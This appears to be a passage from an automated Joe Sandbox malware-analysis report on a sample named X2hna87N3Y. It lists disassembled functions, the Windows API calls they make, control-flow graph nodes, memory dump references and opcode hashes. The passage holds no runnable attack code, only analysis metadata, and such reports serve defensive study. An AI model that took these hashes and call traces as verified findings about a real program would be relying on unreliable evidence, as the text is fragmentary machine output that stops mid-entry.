                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 442123175-0
                                                                                                                  • Opcode ID: 89b71b53d406de64f16557647a705ae995ffd51a6ec38863e9a07ada5d824df9
                                                                                                                  • Instruction ID: 6f3923f3571506b8e7de811ff7ec028ce3171d879315968739bc85e5a0191b36
                                                                                                                  • Opcode Fuzzy Hash: 89b71b53d406de64f16557647a705ae995ffd51a6ec38863e9a07ada5d824df9
                                                                                                                  • Instruction Fuzzy Hash: D2218B75A00219DBCF19CF69DC809E9B7F9EF48305F2441AAE946D7211D730DE828B70

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 224 d98e82-d98e87 225 d98e89-d98ea1 224->225 226 d98eaf-d98eb8 225->226 227 d98ea3-d98ea7 225->227 228 d98eca 226->228 229 d98eba-d98ebd 226->229 227->226 230 d98ea9-d98ead 227->230 233 d98ecc-d98ed9 GetStdHandle 228->233 231 d98ebf-d98ec4 229->231 232 d98ec6-d98ec8 229->232 234 d98f24-d98f28 230->234 231->233 232->233 235 d98edb-d98edd 233->235 236 d98f06-d98f18 233->236 234->225 237 d98f2e-d98f31 234->237 235->236 238 d98edf-d98ee8 GetFileType 235->238 236->234 239 d98f1a-d98f1d 236->239 238->236 240 d98eea-d98ef3 238->240 239->234 241 d98efb-d98efe 240->241 242 d98ef5-d98ef9 240->242 241->234 243 d98f00-d98f04 241->243 242->234 243->234
                                                                                                                  APIs
                                                                                                                  • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,00D98D71,00DB1A10), ref: 00D98ECE
                                                                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00D98D71,00DB1A10), ref: 00D98EE0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileHandleType
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3000768030-0
                                                                                                                  • Opcode ID: 2ebe3586f262f26ae613f3413dd2a8be77239087630994fcb4ef8dc7f436e47b
                                                                                                                  • Instruction ID: cd308b28f9c9a9401e4698144ff615f79513c2320269e2c6be854ee124ce8da9
                                                                                                                  • Opcode Fuzzy Hash: 2ebe3586f262f26ae613f3413dd2a8be77239087630994fcb4ef8dc7f436e47b
                                                                                                                  • Instruction Fuzzy Hash: 9F11B4716047418ACF308E3E8C98622BA959B67B30B3C1719E4B6D65F1CB35D986F264

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetModuleHandleA.KERNEL32 ref: 00DB5B38
                                                                                                                  • GetModuleFileNameA.KERNEL32 ref: 00DB5B58
                                                                                                                    • Part of subcall function 00D81690: std::_Throw_Cpp_error.LIBCPMT ref: 00D816BD
                                                                                                                    • Part of subcall function 00D81690: GetCurrentThreadId.KERNEL32 ref: 00D816CB
                                                                                                                    • Part of subcall function 00D81690: std::_Throw_Cpp_error.LIBCPMT ref: 00D816E4
                                                                                                                    • Part of subcall function 00D81690: std::_Throw_Cpp_error.LIBCPMT ref: 00D81723
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cpp_errorThrow_std::_$Module$CurrentFileHandleNameThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1246727395-0
                                                                                                                  • Opcode ID: 0540fef431cea80bb5f1a6adb6c11ffce954689449985e80f7d4425653697561
                                                                                                                  • Instruction ID: a9aa587a3b388f3aec24e1413883b663a6dcb34c7592702f41cf903c90d9569f
                                                                                                                  • Opcode Fuzzy Hash: 0540fef431cea80bb5f1a6adb6c11ffce954689449985e80f7d4425653697561
                                                                                                                  • Instruction Fuzzy Hash: B211C9B4904218CFCB54FF68D9467DDBBF4EB48700F4049A9E48997350EA745A848FA1

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(00DB1540,0000000C), ref: 00D9125C
                                                                                                                  • ExitThread.KERNEL32 ref: 00D91263
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorExitLastThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1611280651-0
                                                                                                                  • Opcode ID: 5aa0239b223a9ea5534d019e0e1bfec8a5ee9051eefb936836e1500588a58097
                                                                                                                  • Instruction ID: 80451469aa6680f75569a798636df0a558bb784be94db7261cad372599d85319
                                                                                                                  • Opcode Fuzzy Hash: 5aa0239b223a9ea5534d019e0e1bfec8a5ee9051eefb936836e1500588a58097
                                                                                                                  • Instruction Fuzzy Hash: 3DF08C75A40205EFDF01BB70C84AA6E3B75EF41710F144649F4029B291DB3059018BB1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 279 db5600-db564d GetCurrentProcess TerminateProcess call d88eaa 282 db5652-db5657 279->282
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00DB562C
                                                                                                                  • TerminateProcess.KERNELBASE ref: 00DB563F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CurrentTerminate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2429186680-0
                                                                                                                  • Opcode ID: 286f28f5a9345a00d0f4db7737855640d583ba9bbf0b7d8b8e6e6a811415c9ac
                                                                                                                  • Instruction ID: 63d5d3a62e506a890da3667ba79c3fa9436b72b543f76527b8b598e1470587f8
                                                                                                                  • Opcode Fuzzy Hash: 286f28f5a9345a00d0f4db7737855640d583ba9bbf0b7d8b8e6e6a811415c9ac
                                                                                                                  • Instruction Fuzzy Hash: 40F08C71A01208DBD704BF78E8592AE7BE4EF48311F40813DE44ACB340DE3498448BA1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 283 d975d3-d975e7 GetLastError 284 d975e9-d975f1 call d97feb 283->284 285 d97603-d9760d call d9802a 283->285 290 d975fe 284->290 291 d975f3-d975fc 284->291 292 d9760f-d97611 285->292 293 d97613-d9761b call d98700 285->293 290->285 295 d97678-d97681 SetLastError 291->295 292->295 296 d97620-d97626 293->296 297 d97688-d9768d call d9411a 295->297 298 d97683-d97687 295->298 299 d97639-d97647 call d9802a 296->299 300 d97628-d97637 call d9802a 296->300 308 d97649-d97657 call d9802a 299->308 309 d97660-d97675 call d978e4 call d97347 299->309 307 d97658-d9765e call d97347 300->307 317 d97677 307->317 308->307 309->317 317->295
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,00D9126E,00DB1540,0000000C), ref: 00D975D7
                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00D97679
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1452528299-0
                                                                                                                  • Opcode ID: b1b806604a001e8a71ff73c3bb48be303ce7d5932fd5dc9e363ff0aef4d789a8
                                                                                                                  • Instruction ID: 15ece939763b665547f397966d5154b55b6043b6fdfc1b4e7b6815788338b6dd
                                                                                                                  • Opcode Fuzzy Hash: b1b806604a001e8a71ff73c3bb48be303ce7d5932fd5dc9e363ff0aef4d789a8
                                                                                                                  • Instruction Fuzzy Hash: AD11C63227D711EEDFA03BB89CC6D3B2648EF11BA5B140235F515E21A1EE908D096574

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 319 d8a10f-d8a129 320 d8a12b-d8a12d 319->320 321 d8a132-d8a13a 319->321 322 d8a20b-d8a218 call d88eaa 320->322 323 d8a15b-d8a15f 321->323 324 d8a13c-d8a146 321->324 326 d8a165-d8a176 call d8a99f 323->326 327 d8a207 323->327 324->323 332 d8a148-d8a159 324->332 335 d8a178-d8a17c 326->335 336 d8a17e-d8a1b2 326->336 331 d8a20a 327->331 331->322 334 d8a1d4-d8a1d6 332->334 334->331 337 d8a1c5 call d89ac0 335->337 342 d8a1d8-d8a1e0 336->342 343 d8a1b4-d8a1b7 336->343 340 d8a1ca-d8a1d1 337->340 340->334 344 d8a1e2-d8a1f3 call d94dca 342->344 345 d8a1f5-d8a205 342->345 343->342 346 d8a1b9-d8a1bd 343->346 344->327 344->345 345->331 346->327 348 d8a1bf-d8a1c2 346->348 348->337
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f2cdbad74b7adcc63cb4c5723594c84de954f55e63111dd93626bbe997065957
                                                                                                                  • Instruction ID: 4215f6479f7320868267859030ba1f1952d5b037b156898f15cb9603672ec0ce
                                                                                                                  • Opcode Fuzzy Hash: f2cdbad74b7adcc63cb4c5723594c84de954f55e63111dd93626bbe997065957
                                                                                                                  • Instruction Fuzzy Hash: D631843290461AEFDB15EE6CC8849EDB7B9BF09320F14125AE551E3290E731E944CB71
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6d204fa557add1d058cfd897aaec7e8aa1f508c80b363546bd3bfedbdd800a55
                                                                                                                  • Instruction ID: e70df5742ef944d1456af0ba18c24a880a1398547a4f6c35bf5e414090edafea
                                                                                                                  • Opcode Fuzzy Hash: 6d204fa557add1d058cfd897aaec7e8aa1f508c80b363546bd3bfedbdd800a55
                                                                                                                  • Instruction Fuzzy Hash: 7A019637610316DF9F159F68EC4192633A6FFC6F607258225F965CB255DE31D800A7B0

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00D88825
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cpp_errorThrow_std::_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2134207285-0
                                                                                                                  • Opcode ID: fbc3d556adbb0a4fa2745318b740111da8dd0407791bf395753c220eaed8cd06
                                                                                                                  • Instruction ID: 0b884bbf5b93cc5f17ef04f43a714af056e703a079c3ef287ff8ba7e4bf4498c
                                                                                                                  • Opcode Fuzzy Hash: fbc3d556adbb0a4fa2745318b740111da8dd0407791bf395753c220eaed8cd06
                                                                                                                  • Instruction Fuzzy Hash: 9721B7B4904309DFDB04EF68D5516AEBBF1FF48700F40886DE8999B350EB349A45DBA1
                                                                                                                  APIs
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00D88C0B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cpp_errorThrow_std::_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2134207285-0
                                                                                                                  • Opcode ID: 0ee6cdca52963778fa8c3bcda48f0424e552adf95dbeb071dc023accf66387bc
                                                                                                                  • Instruction ID: 3fe78b9121754d8a82077c1879118213871c3abe49c40c1aee4d3dba74013bfc
                                                                                                                  • Opcode Fuzzy Hash: 0ee6cdca52963778fa8c3bcda48f0424e552adf95dbeb071dc023accf66387bc
                                                                                                                  • Instruction Fuzzy Hash: F621A7B4905309DFDB04EF64D5516AEBBF0FF48700F40846DE449A7354EB349A45DBA1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalLeaveSection
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3988221542-0
                                                                                                                  • Opcode ID: f8450a62e993a33e586ac9b08565858553729e5944594874579c3b708b740f0f
                                                                                                                  • Instruction ID: 507f4545d4d41174e10b40e72b813a79e15e47807d798cd79dffc53499d3799e
                                                                                                                  • Opcode Fuzzy Hash: f8450a62e993a33e586ac9b08565858553729e5944594874579c3b708b740f0f
                                                                                                                  • Instruction Fuzzy Hash: 5B0126326083169BDB15AB7CE968768BB50FF45338F24416FD01189581CB225810D331
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,?,?,00D97620,00000001,00000364,?,00000006,000000FF,?,00D9126E,00DB1540,0000000C), ref: 00D98741
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: 93134246d80480d00a949f65cfa88caaf3c5ab22a33acfe48e1581cb14e3b1fb
                                                                                                                  • Instruction ID: 8c79349f18ebbe2077ec14390c2ab2da2a0d3efdaf53a7cb37750fb39a6c5f21
                                                                                                                  • Opcode Fuzzy Hash: 93134246d80480d00a949f65cfa88caaf3c5ab22a33acfe48e1581cb14e3b1fb
                                                                                                                  • Instruction Fuzzy Hash: C5F05431501225E69F215BA69C45F5A7B99DF42BA0B3D4512A848E6191CE30D801A6B1
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00D9935A,?,?,00D9935A,00000220,?,00000000,?), ref: 00D973B3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: 025fa3cb04db64d362809c1bf5ccbbe7b44de9d3ae6503f9cabd1fc7c44f6528
                                                                                                                  • Instruction ID: 7dd6403c586f2fc8f3b25510c75fabe3882c63bc11e43f4323f171a8ab1c1606
                                                                                                                  • Opcode Fuzzy Hash: 025fa3cb04db64d362809c1bf5ccbbe7b44de9d3ae6503f9cabd1fc7c44f6528
                                                                                                                  • Instruction Fuzzy Hash: E2E0923292A222E6EF213A659C02F6B3B4CDF417F0F1D0121FC68D6195DB20CC00A5B5
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __floor_pentium4
                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                  • Opcode ID: 61b5c95b5099b76a587ce3954f3b95dec5b3f83c321fbcfa646464237ed45d1b
